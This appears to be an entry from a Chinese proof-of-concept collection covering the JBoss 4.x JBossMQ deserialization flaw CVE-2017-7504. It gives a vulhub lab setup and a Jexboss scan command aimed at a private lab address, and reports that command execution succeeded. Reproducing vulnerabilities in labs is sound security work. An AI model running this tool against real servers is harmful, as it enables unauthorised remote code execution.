Awesome-POC/Web服务器漏洞/JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504.md
2022-12-06 17:17:54 +08:00

38 lines
1012 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504
## 漏洞描述
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
## 漏洞影响
```
JBoss AS 4.x及之前版本
```
## 环境搭建
```plain
https://github.com/vulhub/vulhub.git
cd vulhub/jboss/CVE-2017-7504
docker-compose build
docker-compose up -d
```
## 漏洞复现
访问控制台
![img](./images/1627121334280-904d0c7a-4bc8-46ee-a4f2-6fe9939c2237.png)
使用工具 [Jexboss](https://github.com/joaomatosf/jexboss) 进行漏洞扫描
```plain
python3 jexboss.py -host http://192.168.51.133:8080
```
![img](./images/1627121338258-e1128eab-4a37-4915-8c7b-584c0baea8d1.png)
![img](./images/1627121342813-aab7d6da-b925-451f-9abb-49f03eb53c84.png)
成功利用漏洞执行命令